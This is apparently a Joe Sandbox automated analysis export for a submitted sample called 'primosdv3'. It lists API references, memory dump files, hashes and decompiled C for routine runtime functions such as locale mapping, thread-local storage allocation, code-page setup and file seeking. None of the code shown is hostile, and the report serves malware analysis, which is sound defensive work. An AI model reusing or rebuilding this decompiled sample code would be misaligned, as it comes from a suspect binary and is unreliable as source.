0x00c8b8a5
0x00c8b8aa
0x00c8b8b5
0x00c8b8c7
0x00c8b9bf
0x00c8b9bf
0x00c8b9c5
0x00c8b9c7
0x00c8b9c8
0x00c8b9c8
0x00c8b9ca
0x00c8b9d0
0x00c8b9d0
0x00c8b9d2
0x00c8b9d4
0x00c8b9dd
0x00c8b9e0
0x00c8b9ec
0x00c8b9f3
0x00c8ba03
0x00c8b9f5
0x00c8b9f5
0x00c8b9f8
0x00c8b9f8
0x00c8b9f8
0x00c8b9fc
0x00c8b9fc
0x00000000
0x00c8b9fc
0x00c8b9e2
0x00c8b9e2
0x00c8b9e7
0x00c8b9e7
0x00c8b9ff
0x00c8b9ff
0x00c8b9ff
0x00c8ba05
0x00c8ba0b
0x00c8ba0b
0x00c8ba11
0x00c8ba12
0x00c8ba12
0x00c8b8cd
0x00c8b8cd
0x00c8b8cf
0x00c8b8cf
0x00c8b8d6
0x00c8b8d7
0x00c8b8db
0x00c8b8e1
0x00c8b8e7
0x00c8b90f
0x00c8b90f
0x00c8b911
0x00000000
0x00000000
0x00c8b8f0
0x00c8b8f4
0x00c8b906
0x00c8b906
0x00c8b908
0x00000000
0x00000000
0x00c8b8f9
0x00c8b8fb
0x00c8b8fd
0x00c8b905
0x00c8b905
0x00000000
0x00c8b905
0x00000000
0x00c8b8fb
0x00c8b90a
0x00c8b90a
0x00c8b90d
0x00c8b90d
0x00c8b914
0x00c8b929
0x00c8b92f
0x00c8b943
0x00c8b94a
0x00c8b959
0x00c8b96b
0x00c8b972
0x00c8b97a
0x00c8b97c
0x00c8b97c
0x00c8b986
0x00c8b996
0x00c8b998
0x00c8b9af
0x00c8b99a
0x00c8b99a
0x00c8b99a
0x00c8b99a
0x00c8b99f
0x00000000
0x00c8b99f
0x00c8b988
0x00c8b988
0x00c8b98d
0x00c8b9a6
0x00c8b9a6
0x00c8b9a6
0x00c8b9b6
0x00c8b9b7
0x00c8b9bb
0x00c8ba26

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00C8B8B8

Strings

, xrefs: 00C8B8FD

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: a468be686ea3f41694b3b84cd2e9081ca6524f85336a4447ee904d183bb172ec
Instruction ID: f5411a5fdffebf6c9a28d8502701656c294bdbda3a2bc05107496781c355131c
Opcode Fuzzy Hash: a468be686ea3f41694b3b84cd2e9081ca6524f85336a4447ee904d183bb172ec
Instruction Fuzzy Hash: 5341277050428C9FDB219E25CC84BFABBBDEB05308F1404EDE59A86142D335AE46DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00C8AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 35%

			E00C8AF6C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				void* _t30;
				intOrPtr* _t33;
				void* _t34;
				signed int _t35;

				_t31 = __edi;
				_t26 = __ecx;
				_t25 = __ebx;
				_push(__ecx);
				_t18 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t18 ^ _t35;
				_t20 = E00C8AC98(0x16, "LCMapStringEx", 0xc979c4, "LCMapStringEx"); // executed
				_t33 = _t20;
				if(_t33 == 0) {
					_t22 = LCMapStringW(E00C8AFF4(__ebx, _t26, _t30, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xc93278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t33();
				}
				_pop(_t34);
				return E00C7FBBC(_t22, _t25, _v8 ^ _t35, _t30, _t31, _t34);
			}

0x00c8af6c
0x00c8af6c
0x00c8af6c
0x00c8af71
0x00c8af72
0x00c8af79
0x00c8af8e
0x00c8af93
0x00c8af9a
0x00c8afdd
0x00c8af9c
0x00c8afb9
0x00c8afbf
0x00c8afbf
0x00c8afe8
0x00c8aff1

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00C8AFDD

Strings

LCMapStringEx, xrefs: 00C8AF7D, 00C8AF87

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 83ed8e709f5a5b21b4ba4e1c84e3aa413b7f394179e829c4d55cb41f8e4f86e2
Instruction ID: 8573cfff80631208f92d23246f5891d3fdedd407176fdab95b4feb13cad6e23d
Opcode Fuzzy Hash: 83ed8e709f5a5b21b4ba4e1c84e3aa413b7f394179e829c4d55cb41f8e4f86e2
Instruction Fuzzy Hash: 70014832505219BBCF02AF90DC0AEEE7F62EF08754F054256FE1866160CB328A31EB85

Uniqueness

Uniqueness Score: -1.00%

Function 00C8AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00C8AF0A(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				void* __esi;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				void* _t23;
				signed int _t24;

				_t20 = __edi;
				_t14 = __ebx;
				_push(__ecx);
				_t8 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t8 ^ _t24;
				_t10 = E00C8AC98(0x14, "InitializeCriticalSectionEx", 0xc979a0, "InitializeCriticalSectionEx"); // executed
				_t22 = _t10;
				if(_t22 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xc93278(_a4, _a8, _a12);
					_t11 =  *_t22();
				}
				_pop(_t23);
				return E00C7FBBC(_t11, _t14, _v8 ^ _t24, _t19, _t20, _t23);
			}

0x00c8af0a
0x00c8af0a
0x00c8af0f
0x00c8af10
0x00c8af17
0x00c8af2c
0x00c8af31
0x00c8af38
0x00c8af55
0x00c8af3a
0x00c8af45
0x00c8af4b
0x00c8af4b
0x00c8af60
0x00c8af69

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00C8A56F), ref: 00C8AF55

Strings

InitializeCriticalSectionEx, xrefs: 00C8AF1B, 00C8AF25

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 80170eaeae5fd0811fc92dc6084866815fea8e87e2b6e0dc9f858dbc1645a5aa
Instruction ID: ad03bcef8894e35a25e77fe98af45874b05af96d7d5d58f62751d12dc36c7386
Opcode Fuzzy Hash: 80170eaeae5fd0811fc92dc6084866815fea8e87e2b6e0dc9f858dbc1645a5aa
Instruction Fuzzy Hash: 57F0E931646218BFCF05BF51CC0AE9E7F61EF04B11B414166FD0996260DB715E10A78E

Uniqueness

Uniqueness Score: -1.00%

Function 00C8ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00C8ADAF(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				signed int _t20;

				_t16 = __edi;
				_t10 = __ebx;
				_push(__ecx);
				_t4 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t4 ^ _t20;
				_t6 = E00C8AC98(3, "FlsAlloc", 0xc97938, "FlsAlloc"); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0xc93278(_a4);
					_t7 =  *_t18();
				}
				_pop(_t19);
				return E00C7FBBC(_t7, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}

0x00c8adaf
0x00c8adaf
0x00c8adb4
0x00c8adb5
0x00c8adbc
0x00c8add1
0x00c8add6
0x00c8addd
0x00c8adee
0x00c8addf
0x00c8ade4
0x00c8adea
0x00c8adea
0x00c8adf9
0x00c8ae02

APIs

TlsAlloc.KERNEL32 ref: 00C8ADEE

Strings

FlsAlloc, xrefs: 00C8ADC0, 00C8ADCA

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 67f6d9ec8cb3f43ee44fed6dc2102ca3c0d58d1c6dc15fad671420f3283e2fba
Instruction ID: 750cb7ece84621fcc0858e4663d6c3be8ff50558d02fadde9adcd6239779e33b
Opcode Fuzzy Hash: 67f6d9ec8cb3f43ee44fed6dc2102ca3c0d58d1c6dc15fad671420f3283e2fba
Instruction Fuzzy Hash: BEE0E5316462287BDA01AB65DC0AF6EBB54DB14B21B0202ABF805A7250DE715E1197DE

Uniqueness

Uniqueness Score: -1.00%

Function 00C8BBF0 Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00C8BBF0(void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t75;
				signed int _t78;
				signed char* _t79;
				short* _t80;
				int _t84;
				signed char _t85;
				signed int _t86;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t91 = __edi;
				_t48 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t48 ^ _t96;
				_t95 = _a8;
				_t75 = E00C8B7BB(__eflags, _a4);
				if(_t75 != 0) {
					_push(__edi);
					_t92 = 0;
					__eflags = 0;
					_t78 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xc9e978)) - _t75;
						if( *((intOrPtr*)(_t51 + 0xc9e978)) == _t75) {
							break;
						}
						_t78 = _t78 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t78;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t75 - 0xfde8;
							if(_t75 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t75 - 0xfde9;
								if(_t75 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t75 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t75,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xcc26c4 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00C8B82E(_t95);
												goto L37;
											}
										} else {
											E00C7FFF0(_t92, _t95 + 0x18, _t92, 0x101);
											 *(_t95 + 4) = _t75;
											 *(_t95 + 0x21c) = _t92;
											_t75 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t95 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t85 = _t71[1];
														__eflags = _t85;
														if(_t85 == 0) {
															goto L16;
														}
														_t89 = _t85 & 0x000000ff;
														_t86 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t86 - _t89;
															if(_t86 > _t89) {
																break;
															}
															 *(_t95 + _t86 + 0x19) =  *(_t95 + _t86 + 0x19) | 0x00000004;
															_t86 = _t86 + 1;
															__eflags = _t86;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t95 + 0x1a;
												_t84 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t84 = _t84 - 1;
													__eflags = _t84;
												} while (_t84 != 0);
												 *(_t95 + 0x21c) = E00C8B77D( *(_t95 + 4));
												 *(_t95 + 8) = _t75;
											}
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00C8B893(_t89, _t95); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						_pop(_t91);
						goto L39;
					}
					E00C7FFF0(_t92, _t95 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xc9e988;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t79 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t79[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t79 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0xc9e970; // 0x8040201
										 *(_t95 + _t90 + 0x19) =  *(_t95 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t79[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t79 =  &(_t79[2]);
								__eflags =  *_t79;
								if( *_t79 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t75;
					 *(_t95 + 8) = 1;
					 *(_t95 + 0x21c) = E00C8B77D(_t75);
					_t80 = _t95 + 0xc;
					_t89 = _v36 + 0xc9e97c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t80 = _t58;
						_t80 = _t80 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E00C8B82E(_t95);
					_t60 = 0;
				}
				L39:
				return E00C7FBBC(_t60, _t75, _v8 ^ _t96, _t89, _t91, _t95);
			}

0x00c8bbf0
0x00c8bbf8
0x00c8bbff
0x00c8bc07
0x00c8bc0f
0x00c8bc14
0x00c8bc24
0x00c8bc25
0x00c8bc25
0x00c8bc27
0x00c8bc29
0x00c8bc2b
0x00c8bc2e
0x00c8bc2e
0x00c8bc34
0x00000000
0x00000000
0x00c8bc3a
0x00c8bc3b
0x00c8bc3e
0x00c8bc41
0x00c8bc46
0x00000000
0x00c8bc48
0x00c8bc48
0x00c8bc4e
0x00c8bd1c
0x00c8bd1c
0x00c8bc54
0x00c8bc54
0x00c8bc5a
0x00000000
0x00c8bc60
0x00c8bc64
0x00c8bc6a
0x00c8bc6c
0x00000000
0x00c8bc72
0x00c8bc77
0x00c8bc7d
0x00c8bc7f
0x00c8bd09
0x00c8bd0f
0x00000000
0x00c8bd11
0x00c8bd12
0x00000000
0x00c8bd12
0x00c8bc85
0x00c8bc8f
0x00c8bc94
0x00c8bc9c
0x00c8bca2
0x00c8bca3
0x00c8bca6
0x00c8bcf9
0x00c8bca8
0x00c8bca8
0x00c8bcac
0x00c8bcaf
0x00c8bcb1
0x00c8bcb1
0x00c8bcb4
0x00c8bcb6
0x00000000
0x00000000
0x00c8bcb8
0x00c8bcbb
0x00c8bcc6
0x00c8bcc6
0x00c8bcc8
0x00000000
0x00000000
0x00c8bcc0
0x00c8bcc5
0x00c8bcc5
0x00c8bcc5
0x00c8bcca
0x00c8bccd
0x00c8bcd0
0x00000000
0x00000000
0x00000000
0x00c8bcd0
0x00c8bcb1
0x00c8bcd2
0x00c8bcd2
0x00c8bcd5
0x00c8bcda
0x00c8bcda
0x00c8bcdd
0x00c8bcde
0x00c8bcde
0x00c8bcde
0x00c8bcee
0x00c8bcf4
0x00c8bcf4
0x00c8bd01
0x00c8bd02
0x00c8bd03
0x00c8bdc7
0x00c8bdc8
0x00c8bdcd
0x00c8bdce
0x00c8bdce
0x00c8bdce
0x00c8bc7f
0x00c8bc6c
0x00c8bc5a
0x00c8bc4e
0x00c8bdd0
0x00000000
0x00c8bdd0
0x00c8bd2e
0x00c8bd36
0x00c8bd36
0x00c8bd3a
0x00c8bd3d
0x00c8bd43
0x00c8bd46
0x00c8bd46
0x00c8bd49
0x00c8bd4b
0x00c8bd4d
0x00c8bd4d
0x00c8bd50
0x00c8bd52
0x00000000
0x00000000
0x00c8bd54
0x00c8bd57
0x00c8bd73
0x00c8bd73
0x00c8bd75
0x00000000
0x00000000
0x00c8bd5c
0x00c8bd62
0x00c8bd64
0x00c8bd6a
0x00c8bd6e
0x00c8bd6e
0x00c8bd6f
0x00000000
0x00c8bd6f
0x00000000
0x00c8bd62
0x00c8bd77
0x00c8bd7a
0x00c8bd7d
0x00000000
0x00000000
0x00000000
0x00c8bd7d
0x00c8bd7f
0x00c8bd7f
0x00c8bd82
0x00c8bd83
0x00c8bd86
0x00c8bd89
0x00c8bd89
0x00c8bd8f
0x00c8bd92
0x00c8bda1
0x00c8bdaa
0x00c8bdaf
0x00c8bdb5
0x00c8bdb6
0x00c8bdb6
0x00c8bdb9
0x00c8bdbc
0x00c8bdbf
0x00c8bdc2
0x00c8bdc2
0x00c8bdc2
0x00000000
0x00c8bc16
0x00c8bc17
0x00c8bc1d
0x00c8bc1d
0x00c8bdd1
0x00c8bde0

APIs

Part of subcall function 00C8B7BB: GetOEMCP.KERNEL32(00000000,?,?,00C8BA44,?), ref: 00C8B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C8BA89,?,00000000), ref: 00C8BC64
GetCPInfo.KERNEL32(00000000,00C8BA89,?,?,?,00C8BA89,?,00000000), ref: 00C8BC77

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 099ad09f46f01baef6c2b9f074b6f0f537d8f074a14bb959d08a379be220bcce
Instruction ID: 7a89bbb720d0a261fcaab3c4759d1c63033222cf8439c98becb0f8bccd376cd2
Opcode Fuzzy Hash: 099ad09f46f01baef6c2b9f074b6f0f537d8f074a14bb959d08a379be220bcce
Instruction Fuzzy Hash: 52515770900245AFDB20EF75C8816BBBBE4EF41308F18446FD4A68B252D7359E46DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00C69A74 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00C69A74(signed int __ecx, long* _a4, signed int _a8, long _a12, signed int _a20, char _a24, long _a4124, long _a4128, long _a4132) {
				signed int _v0;
				long* _v4;
				intOrPtr _v8;
				void* _t30;
				long _t32;
				signed int _t33;
				void* _t35;
				long* _t38;
				void* _t41;
				long _t42;
				signed int _t46;
				long _t50;
				void* _t51;
				long _t52;
				intOrPtr* _t53;
				void* _t57;
				void* _t63;
				signed int _t67;
				signed int _t70;

				E00C7EC50(0x1018);
				_t50 = _a4132;
				_t42 = _a4128;
				_t53 = __ecx;
				_t52 = _a4124;
				_v0 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0xffffffff) {
					L21:
					_t30 = 1;
					L22:
					return _t30;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 1) {
					__eflags = _t42;
					if(__eflags > 0) {
						L32:
						_a12 = _t42;
						_t32 = SetFilePointer( *(_t53 + 8), _t52,  &_a12, _t50); // executed
						__eflags = _t32 - 0xffffffff;
						if(_t32 != 0xffffffff) {
							goto L21;
						}
						_t33 = GetLastError();
						asm("sbb al, al");
						_t30 =  ~_t33 + 1;
						goto L22;
					}
					if(__eflags < 0) {
						L27:
						__eflags = _t50;
						if(_t50 == 0) {
							goto L32;
						}
						__eflags = _t50 - 1;
						if(_t50 != 1) {
							_t35 = E00C6981A(_t50);
						} else {
							 *0xc93278();
							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x14))))();
							_t53 = _v0;
						}
						_t52 = _t52 + _t35;
						asm("adc ebx, edx");
						_t50 = 0;
						__eflags = 0;
						goto L32;
					}
					__eflags = _t52;
					if(_t52 >= 0) {
						goto L32;
					}
					goto L27;
				}
				_t38 = __ecx + 0x28;
				_a4 = _t38;
				if(_t50 != 1) {
					__eflags = _t50;
					if(_t50 != 0) {
						L23:
						_t30 = 0;
						goto L22;
					}
					L5:
					_t63 = _t42 - _t38[1];
					if(_t63 < 0 || _t63 <= 0 && _t52 <  *_t38) {
						goto L23;
					} else {
						_t46 = _t42;
						_t57 = _t52 -  *_t38;
						asm("sbb ecx, [eax+0x4]");
						_a8 = _t46;
						if(_t57 != 0 || _t57 != 0) {
							do {
								_t67 = _t46;
								if(_t67 > 0 || _t67 >= 0 && _t57 >= 0x1000) {
									L14:
									_t12 =  &_a20;
									 *_t12 = _a20 & 0x00000000;
									__eflags =  *_t12;
									_t51 = 0x1000;
									goto L15;
								} else {
									_t51 = _t57;
									_a20 = _t46;
									L15:
									 *0xc93278( &_a24, _t51);
									_t41 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0xc))))();
									if(_t41 <= 0) {
										goto L23;
									}
									_t46 = _v0;
									_t53 = _v8;
									asm("cdq");
									_t57 = _t57 - _t41;
									asm("sbb ecx, edx");
									_v0 = _t46;
									_t70 = _t46;
									if(_t70 > 0) {
										goto L14;
									}
								}
							} while (_t70 >= 0 && _t57 != 0);
							_t38 = _v4;
							goto L20;
						} else {
							L20:
							 *_t38 = _t52;
							_t38[1] = _t42;
							goto L21;
						}
					}
				}
				_t52 = _t52 +  *_t38;
				asm("adc ebx, [eax+0x4]");
				goto L5;
			}

0x00c69a79
0x00c69a7e
0x00c69a86
0x00c69a8f
0x00c69a92
0x00c69a99
0x00c69aa1
0x00c69b53
0x00c69b53
0x00c69b59
0x00c69b5f
0x00c69b5f
0x00c69aab
0x00c69b66
0x00c69b68
0x00c69b9d
0x00c69ba2
0x00c69bab
0x00c69bb1
0x00c69bb4
0x00000000
0x00000000
0x00c69bb6
0x00c69bbe
0x00c69bc0
0x00000000
0x00c69bc0
0x00c69b6a
0x00c69b70
0x00c69b70
0x00c69b72
0x00000000
0x00000000
0x00c69b74
0x00c69b77
0x00c69b92
0x00c69b79
0x00c69b80
0x00c69b8a
0x00c69b8c
0x00c69b8c
0x00c69b97
0x00c69b99
0x00c69b9b
0x00c69b9b
0x00000000
0x00c69b9b
0x00c69b6c
0x00c69b6e
0x00000000
0x00000000
0x00000000
0x00c69b6e
0x00c69ab1
0x00c69ab4
0x00c69abb
0x00c69ac4
0x00c69ac6
0x00c69b62
0x00c69b62
0x00000000
0x00c69b62
0x00c69acc
0x00c69acc
0x00c69acf
0x00000000
0x00c69adf
0x00c69ae1
0x00c69ae3
0x00c69ae5
0x00c69ae8
0x00c69aec
0x00c69af2
0x00c69af2
0x00c69af4
0x00c69b08
0x00c69b08
0x00c69b08
0x00c69b08
0x00c69b0d
0x00000000
0x00c69b00
0x00c69b00
0x00c69b02
0x00c69b12
0x00c69b1f
0x00c69b29
0x00c69b2d
0x00000000
0x00000000
0x00c69b2f
0x00c69b33
0x00c69b37
0x00c69b38
0x00c69b3a
0x00c69b3c
0x00c69b40
0x00c69b42
0x00000000
0x00000000
0x00c69b42
0x00c69b44
0x00c69b4a
0x00000000
0x00c69b4e
0x00c69b4e
0x00c69b4e
0x00c69b50
0x00000000
0x00c69b50
0x00c69aec
0x00c69acf
0x00c69abd
0x00c69abf
0x00000000

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00C69A50,?,?,00000000,?,?,00C68CBC,?), ref: 00C69BAB
GetLastError.KERNEL32(?,00000000,00C68411,-00009570,00000000,000007F3), ref: 00C69BB6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: bcdd027bf57826c64065a79b1ecc2ea3305691580979a37c32a734296b099377
Instruction ID: 6fbdeb981a36cc5d2b171ab99e0940a20a592d1398e0b2fbeff77a0bb9611b7e
